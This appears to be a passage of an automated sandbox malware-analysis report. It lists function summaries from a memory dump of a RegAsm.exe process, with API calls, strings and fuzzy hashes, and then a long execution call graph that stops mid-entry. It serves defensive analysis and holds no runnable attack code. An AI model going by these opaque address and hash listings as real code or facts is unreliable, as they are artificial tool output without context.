                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                              • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                              • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                              • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                              • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                                                                                              • _free.LIBCMT ref: 10004CE8
                                                                                                                                              • _free.LIBCMT ref: 10004CF2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                              • API String ID: 2506810119-1068371695
                                                                                                                                              • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                              • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                              • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                              • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHandleLibraryModule
                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                              • API String ID: 662261464-1276376045
                                                                                                                                              • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                              • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                              • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                              • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                              APIs
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                              • __freea.LIBCMT ref: 100087D5
                                                                                                                                                • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2652629310-0
                                                                                                                                              • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                              • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                              • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                              • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                              APIs
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$CloseHandleReadSize
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3642004256-0
                                                                                                                                              • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                              • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                              • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                              • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                              APIs
                                                                                                                                              • _free.LIBCMT ref: 1000655C
                                                                                                                                                • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                                                                                                • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                                                • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                              • String ID: *?$.
                                                                                                                                              • API String ID: 2667617558-3972193922
                                                                                                                                              • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                              • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                                              • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                              • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _strlen
                                                                                                                                              • String ID: : $Se.
                                                                                                                                              • API String ID: 4218353326-4089948878
                                                                                                                                              • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                              • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                              • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                              • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                              APIs
                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                                • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                              • String ID: Unknown exception
                                                                                                                                              • API String ID: 3476068407-410509341
                                                                                                                                              • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                              • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                              • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                              • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:5.4%
                                                                                                                                              Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                              Signature Coverage:1.8%
                                                                                                                                              Total number of Nodes:1990
                                                                                                                                              Total number of Limit Nodes:56
                                                                                                                                              execution_graph 37716 4466f4 37735 446904 37716->37735 37718 446700 GetModuleHandleA 37721 446710 __set_app_type __p__fmode __p__commode 37718->37721 37720 4467a4 37722 4467ac __setusermatherr 37720->37722 37723 4467b8 37720->37723 37721->37720 37722->37723 37736 4468f0 _controlfp 37723->37736 37725 4467bd _initterm GetEnvironmentStringsW _initterm 37726 44681e GetStartupInfoW 37725->37726 37727 446810 37725->37727 37729 446866 GetModuleHandleA 37726->37729 37737 41276d 37729->37737 37733 446896 exit 37734 44689d _cexit 37733->37734 37734->37727 37735->37718 37736->37725 37738 41277d 37737->37738 37780 4044a4 LoadLibraryW 37738->37780 37740 412785 37741 412789 37740->37741 37786 414b81 37740->37786 37741->37733 37741->37734 37744 4127c8 37790 412465 memset ??2@YAPAXI 37744->37790 37746 4127ea 37802 40ac21 37746->37802 37751 412813 37820 40dd07 memset 37751->37820 37752 412827 37825 40db69 memset 37752->37825 37755 412822 37847 4125b6 ??3@YAXPAX DeleteObject 37755->37847 37757 40ada2 _wcsicmp 37758 41283d 37757->37758 37758->37755 37761 412863 CoInitialize 37758->37761 37830 41268e 37758->37830 37760 412966 37848 40b1ab free free 37760->37848 37846 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37761->37846 37765 41296f 37849 40b633 37765->37849 37767 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37772 412957 CoUninitialize 37767->37772 37777 4128ca 37767->37777 37772->37755 37773 4128d0 TranslateAcceleratorW 37774 412941 GetMessageW 37773->37774 37773->37777 37774->37772 37774->37773 37775 412909 IsDialogMessageW 37775->37774 37775->37777 37776 4128fd IsDialogMessageW 37776->37774 37776->37775 37777->37773 37777->37775 37777->37776 37778 41292b TranslateMessage DispatchMessageW 37777->37778 37779 41291f IsDialogMessageW 37777->37779 37778->37774 37779->37774 37779->37778 37781 4044f3 37780->37781 37785 4044cf FreeLibrary 37780->37785 37783 404507 MessageBoxW 37781->37783 37784 40451e 37781->37784 37783->37740 37784->37740 37785->37781 37787 414b8a 37786->37787 37788 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37786->37788 37853 40a804 memset 37787->37853 37788->37744 37791 4124e0 37790->37791 37792 412505 ??2@YAPAXI 37791->37792 37793 41251c 37792->37793 37798 412521 37792->37798 37875 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37793->37875 37864 444722 37798->37864 37801 41259b wcscpy 37801->37746 37880 40b1ab free free 37802->37880 37806 40ad4b 37815 40ad76 37806->37815 37904 40a9ce 37806->37904 37807 40a9ce malloc memcpy free free 37808 40ac5c 37807->37808 37808->37806 37808->37807 37810 40ace7 free 37808->37810 37808->37815 37884 40a8d0 37808->37884 37896 4099f4 37808->37896 37810->37808 37814 40a8d0 7 API calls 37814->37815 37881 40aa04 37815->37881 37816 40ada2 37817 40adaa 37816->37817 37818 40adc9 37816->37818 37817->37818 37819 40adb3 _wcsicmp 37817->37819 37818->37751 37818->37752 37819->37817 37819->37818 37909 40dce0 37820->37909 37822 40dd3a GetModuleHandleW 37914 40dba7 37822->37914 37826 40dce0 3 API calls 37825->37826 37827 40db99 37826->37827 37986 40dae1 37827->37986 38000 402f3a 37830->38000 37832 412766 37832->37755 37832->37761 37833 4126d3 _wcsicmp 37834 4126a8 37833->37834 37834->37832 37834->37833 37836 41270a 37834->37836 38034 4125f8 7 API calls 37834->38034 37836->37832 38003 411ac5 37836->38003 37846->37767 37847->37760 37848->37765 37850 40b640 37849->37850 37851 40b639 free 37849->37851 37852 40b1ab free free 37850->37852 37851->37850 37852->37741 37854 40a83b GetSystemDirectoryW 37853->37854 37855 40a84c wcscpy 37853->37855 37854->37855 37860 409719 wcslen 37855->37860 37858 40a881 LoadLibraryW 37859 40a886 37858->37859 37859->37788 37861 409724 37860->37861 37862 409739 wcscat LoadLibraryW 37860->37862 37861->37862 37863 40972c wcscat 37861->37863 37862->37858 37862->37859 37863->37862 37865 444732 37864->37865 37866 444728 DeleteObject 37864->37866 37876 409cc3 37865->37876 37866->37865 37868 412551 37869 4010f9 37868->37869 37870 401130 37869->37870 37871 401134 GetModuleHandleW LoadIconW 37870->37871 37872 401107 wcsncat 37870->37872 37873 40a7be 37871->37873 37872->37870 37874 40a7d2 37873->37874 37874->37801 37874->37874 37875->37798 37879 409bfd memset wcscpy 37876->37879 37878 409cdb CreateFontIndirectW 37878->37868 37879->37878 37880->37808 37882 40aa14 37881->37882 37883 40aa0a free 37881->37883 37882->37816 37883->37882 37885 40a8eb 37884->37885 37886 40a8df wcslen 37884->37886 37887 40a906 free 37885->37887 37888 40a90f 37885->37888 37886->37885 37892 40a919 37887->37892 37889 4099f4 3 API calls 37888->37889 37889->37892 37890 40a932 37894 4099f4 3 API calls 37890->37894 37891 40a929 free 37893 40a93e memcpy 37891->37893 37892->37890 37892->37891 37893->37808 37895 40a93d 37894->37895 37895->37893 37897 409a41 37896->37897 37898 4099fb malloc 37896->37898 37897->37808 37900 409a37 37898->37900 37901 409a1c 37898->37901 37900->37808 37902 409a30 free 37901->37902 37903 409a20 memcpy 37901->37903 37902->37900 37903->37902 37905 40a9e7 37904->37905 37906 40a9dc free 37904->37906 37908 4099f4 3 API calls 37905->37908 37907 40a9f2 37906->37907 37907->37814 37908->37907 37933 409bca GetModuleFileNameW 37909->37933 37911 40dce6 wcsrchr 37912 40dcf5 37911->37912 37913 40dcf9 wcscat 37911->37913 37912->37913 37913->37822 37934 44db70 37914->37934 37918 40dbfd 37937 4447d9 37918->37937 37921 40dc34 wcscpy wcscpy 37963 40d6f5 37921->37963 37922 40dc1f wcscpy 37922->37921 37925 40d6f5 3 API calls 37926 40dc73 37925->37926 37927 40d6f5 3 API calls 37926->37927 37928 40dc89 37927->37928 37929 40d6f5 3 API calls 37928->37929 37930 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37929->37930 37969 40da80 37930->37969 37933->37911 37935 40dbb4 memset memset 37934->37935 37936 409bca GetModuleFileNameW 37935->37936 37936->37918 37939 4447f4 37937->37939 37938 40dc1b 37938->37921 37938->37922 37939->37938 37940 444807 ??2@YAPAXI 37939->37940 37941 44481f 37940->37941 37942 444873 _snwprintf 37941->37942 37943 4448ab wcscpy 37941->37943 37976 44474a 8 API calls 37942->37976 37945 4448bb 37943->37945 37977 44474a 8 API calls 37945->37977 37946 4448a7 37946->37943 37946->37945 37948 4448cd 37978 44474a 8 API calls 37948->37978 37950 4448e2 37979 44474a 8 API calls 37950->37979 37952 4448f7 37980 44474a 8 API calls 37952->37980 37954 44490c 37981 44474a 8 API calls 37954->37981 37956 444921 37982 44474a 8 API calls 37956->37982 37958 444936 37983 44474a 8 API calls 37958->37983 37960 44494b 37984 44474a 8 API calls 37960->37984 37962 444960 ??3@YAXPAX 37962->37938 37964 44db70 37963->37964 37965 40d702 memset GetPrivateProfileStringW 37964->37965 37966 40d752 37965->37966 37967 40d75c WritePrivateProfileStringW 37965->37967 37966->37967 37968 40d758 37966->37968 37967->37968 37968->37925 37970 44db70 37969->37970 37971 40da8d memset 37970->37971 37972 40daac LoadStringW 37971->37972 37973 40dac6 37972->37973 37973->37972 37975 40dade 37973->37975 37985 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37973->37985 37975->37755 37976->37946 37977->37948 37978->37950 37979->37952 37980->37954 37981->37956 37982->37958 37983->37960 37984->37962 37985->37973 37996 409b98 GetFileAttributesW 37986->37996 37988 40daea 37989 40db63 37988->37989 37990 40daef wcscpy wcscpy GetPrivateProfileIntW 37988->37990 37989->37757 37997 40d65d GetPrivateProfileStringW 37990->37997 37992 40db3e 37998 40d65d GetPrivateProfileStringW 37992->37998 37994 40db4f 37999 40d65d GetPrivateProfileStringW 37994->37999 37996->37988 37997->37992 37998->37994 37999->37989 38035 40eaff 38000->38035 38004 411ae2 memset 38003->38004 38005 411b8f 38003->38005 38076 409bca GetModuleFileNameW 38004->38076 38017 411a8b 38005->38017 38007 411b0a wcsrchr 38008 411b22 wcscat 38007->38008 38009 411b1f 38007->38009 38077 414770 wcscpy wcscpy wcscpy CloseHandle 38008->38077 38009->38008 38011 411b67 38078 402afb 38011->38078 38015 411b7f 38134 40ea13 SendMessageW memset SendMessageW 38015->38134 38018 402afb 27 API calls 38017->38018 38019 411ac0 38018->38019 38020 4110dc 38019->38020 38021 41113e 38020->38021 38026 4110f0 38020->38026 38159 40969c LoadCursorW SetCursor 38021->38159 38023 411143 38160 4032b4 38023->38160 38178 444a54 38023->38178 38024 4110f7 _wcsicmp 38024->38026 38025 411157 38027 40ada2 _wcsicmp 38025->38027 38026->38021 38026->38024 38181 410c46 10 API calls 38026->38181 38030 411167 38027->38030 38028 4111af 38030->38028 38031 4111a6 qsort 38030->38031 38031->38028 38034->37834 38036 40eb10 38035->38036 38049 40e8e0 38036->38049 38039 40eb6c memcpy memcpy 38040 40ebe1 38039->38040 38041 40ebb7 38039->38041 38040->38039 38042 40ebf2 ??2@YAPAXI ??2@YAPAXI 38040->38042 38041->38040 38043 40d134 16 API calls 38041->38043 38044 40ec2e ??2@YAPAXI 38042->38044 38047 40ec65 38042->38047 38043->38041 38044->38047 38059 40ea7f 38047->38059 38048 402f49 38048->37834 38050 40e8f2 38049->38050 38051 40e8eb ??3@YAXPAX 38049->38051 38052 40e900 38050->38052 38053 40e8f9 ??3@YAXPAX 38050->38053 38051->38050 38054 40e911 38052->38054 38055 40e90a ??3@YAXPAX 38052->38055 38053->38052 38056 40e931 ??2@YAPAXI ??2@YAPAXI 38054->38056 38057 40e921 ??3@YAXPAX 38054->38057 38058 40e92a ??3@YAXPAX 38054->38058 38055->38054 38056->38039 38057->38058 38058->38056 38060 40aa04 free 38059->38060 38061 40ea88 38060->38061 38062 40aa04 free 38061->38062 38063 40ea90 38062->38063 38064 40aa04 free 38063->38064 38065 40ea98 38064->38065 38066 40aa04 free 38065->38066 38067 40eaa0 38066->38067 38068 40a9ce 4 API calls 38067->38068 38069 40eab3 38068->38069 38070 40a9ce 4 API calls 38069->38070 38071 40eabd 38070->38071 38072 40a9ce 4 API calls 38071->38072 38073 40eac7 38072->38073 38074 40a9ce 4 API calls 38073->38074 38075 40ead1 38074->38075 38075->38048 38076->38007 38077->38011 38135 40b2cc 38078->38135 38080 402b0a 38081 40b2cc 27 API calls 38080->38081 38082 402b23 38081->38082 38083 40b2cc 27 API calls 38082->38083 38084 402b3a 38083->38084 38085 40b2cc 27 API calls 38084->38085 38086 402b54 38085->38086 38087 40b2cc 27 API calls 38086->38087 38088 402b6b 38087->38088 38089 40b2cc 27 API calls 38088->38089 38090 402b82 38089->38090 38091 40b2cc 27 API calls 38090->38091 38092 402b99 38091->38092 38093 40b2cc 27 API calls 38092->38093 38094 402bb0 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402bc7 38095->38096 38097 40b2cc 27 API calls 38096->38097 38098 402bde 38097->38098 38099 40b2cc 27 API calls 38098->38099 38100 402bf5 38099->38100 38101 40b2cc 27 API calls 38100->38101 38102 402c0c 38101->38102 38103 40b2cc 27 API calls 38102->38103 38104 402c23 38103->38104 38105 40b2cc 27 API calls 38104->38105 38106 402c3a 38105->38106 38107 40b2cc 27 API calls 38106->38107 38108 402c51 38107->38108 38109 40b2cc 27 API calls 38108->38109 38110 402c68 38109->38110 38111 40b2cc 27 API calls 38110->38111 38112 402c7f 38111->38112 38113 40b2cc 27 API calls 38112->38113 38114 402c99 38113->38114 38115 40b2cc 27 API calls 38114->38115 38116 402cb3 38115->38116 38117 40b2cc 27 API calls 38116->38117 38118 402cd5 38117->38118 38119 40b2cc 27 API calls 38118->38119 38120 402cf0 38119->38120 38121 40b2cc 27 API calls 38120->38121 38122 402d0b 38121->38122 38123 40b2cc 27 API calls 38122->38123 38124 402d26 38123->38124 38125 40b2cc 27 API calls 38124->38125 38126 402d3e 38125->38126 38127 40b2cc 27 API calls 38126->38127 38128 402d59 38127->38128 38129 40b2cc 27 API calls 38128->38129 38130 402d78 38129->38130 38131 40b2cc 27 API calls 38130->38131 38132 402d93 38131->38132 38133 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38132->38133 38133->38015 38134->38005 38138 40b58d 38135->38138 38137 40b2d1 38137->38080 38139 40b5a4 GetModuleHandleW FindResourceW 38138->38139 38140 40b62e 38138->38140 38141 40b5c2 LoadResource 38139->38141 38143 40b5e7 38139->38143 38140->38137 38142 40b5d0 SizeofResource LockResource 38141->38142 38141->38143 38142->38143 38143->38140 38151 40afcf 38143->38151 38145 40b608 memcpy 38154 40b4d3 memcpy 38145->38154 38147 40b61e 38155 40b3c1 18 API calls 38147->38155 38149 40b626 38156 40b04b 38149->38156 38152 40b04b ??3@YAXPAX 38151->38152 38153 40afd7 ??2@YAPAXI 38152->38153 38153->38145 38154->38147 38155->38149 38157 40b051 ??3@YAXPAX 38156->38157 38158 40b05f 38156->38158 38157->38158 38158->38140 38159->38023 38161 4032c4 38160->38161 38162 40b633 free 38161->38162 38163 403316 38162->38163 38182 44553b 38163->38182 38167 403480 38380 40368c 15 API calls 38167->38380 38169 403489 38170 40b633 free 38169->38170 38172 403495 38170->38172 38171 40333c 38171->38167 38173 4033a9 memset memcpy 38171->38173 38174 4033ec wcscmp 38171->38174 38378 4028e7 11 API calls 38171->38378 38379 40f508 6 API calls 38171->38379 38172->38025 38173->38171 38173->38174 38174->38171 38176 403421 _wcsicmp 38176->38171 38179 444a64 FreeLibrary 38178->38179 38180 444a83 38178->38180 38179->38180 38180->38025 38181->38026 38183 445548 38182->38183 38184 445599 38183->38184 38381 40c768 38183->38381 38185 4455a8 memset 38184->38185 38327 4457f2 38184->38327 38465 403988 38185->38465 38191 4455e5 38200 445672 38191->38200 38210 44560f 38191->38210 38193 4458bb memset memset 38197 414c2e 16 API calls 38193->38197 38195 4459ed 38201 445a00 memset memset 38195->38201 38202 445b22 38195->38202 38196 44595e memset memset 38203 414c2e 16 API calls 38196->38203 38204 4458f9 38197->38204 38198 44557a 38205 44558c 38198->38205 38445 4136c0 38198->38445 38476 403fbe memset memset memset memset memset 38200->38476 38207 414c2e 16 API calls 38201->38207 38212 445bca 38202->38212 38213 445b38 memset memset memset 38202->38213 38208 44599c 38203->38208 38209 40b2cc 27 API calls 38204->38209 38449 444b06 38205->38449 38217 445a3e 38207->38217 38219 40b2cc 27 API calls 38208->38219 38220 445909 38209->38220 38222 4087b3 335 API calls 38210->38222 38221 445c8b memset memset 38212->38221 38278 445cf0 38212->38278 38225 445bd4 38213->38225 38226 445b98 38213->38226 38214 445849 38659 40b1ab free free 38214->38659 38227 40b2cc 27 API calls 38217->38227 38235 4459ac 38219->38235 38231 409d1f 6 API calls 38220->38231 38236 414c2e 16 API calls 38221->38236 38232 445621 38222->38232 38224 44589f 38660 40b1ab free free 38224->38660 38614 414c2e 38225->38614 38226->38225 38238 445ba2 38226->38238 38240 445a4f 38227->38240 38230 403335 38377 4452e5 43 API calls 38230->38377 38246 445919 38231->38246 38645 4454bf 20 API calls 38232->38645 38233 445823 38233->38214 38255 4087b3 335 API calls 38233->38255 38234 445854 38241 4458aa 38234->38241 38591 403c9c memset memset memset memset memset 38234->38591 38247 409d1f 6 API calls 38235->38247 38248 445cc9 38236->38248 38750 4099c6 wcslen 38238->38750 38239 4456b2 38647 40b1ab free free 38239->38647 38252 409d1f 6 API calls 38240->38252 38241->38193 38274 44594a 38241->38274 38244 445d3d 38273 40b2cc 27 API calls 38244->38273 38245 445d88 memset memset memset 38256 414c2e 16 API calls 38245->38256 38661 409b98 GetFileAttributesW 38246->38661 38257 4459bc 38247->38257 38258 409d1f 6 API calls 38248->38258 38249 445879 38249->38224 38268 4087b3 335 API calls 38249->38268 38251 445680 38251->38239 38499 4087b3 memset 38251->38499 38261 445a63 38252->38261 38253 40b2cc 27 API calls 38262 445bf3 38253->38262 38255->38233 38265 445dde 38256->38265 38726 409b98 GetFileAttributesW 38257->38726 38267 445ce1 38258->38267 38259 445bb3 38753 445403 memset 38259->38753 38271 40b2cc 27 API calls 38261->38271 38630 409d1f wcslen wcslen 38262->38630 38263 445928 38263->38274 38662 40b6ef 38263->38662 38275 40b2cc 27 API calls 38265->38275 38770 409b98 GetFileAttributesW 38267->38770 38268->38249 38280 445a94 38271->38280 38283 445d54 _wcsicmp 38273->38283 38274->38195 38274->38196 38286 445def 38275->38286 38276 4459cb 38276->38195 38293 40b6ef 249 API calls 38276->38293 38278->38230 38278->38244 38278->38245 38279 445389 255 API calls 38279->38212 38727 40ae18 38280->38727 38281 44566d 38281->38327 38550 413d4c 38281->38550 38290 445d71 38283->38290 38354 445d67 38283->38354 38285 445665 38646 40b1ab free free 38285->38646 38291 409d1f 6 API calls 38286->38291 38771 445093 23 API calls 38290->38771 38298 445e03 38291->38298 38293->38195 38294 4456d8 38300 40b2cc 27 API calls 38294->38300 38297 44563c 38297->38285 38303 4087b3 335 API calls 38297->38303 38772 409b98 GetFileAttributesW 38298->38772 38299 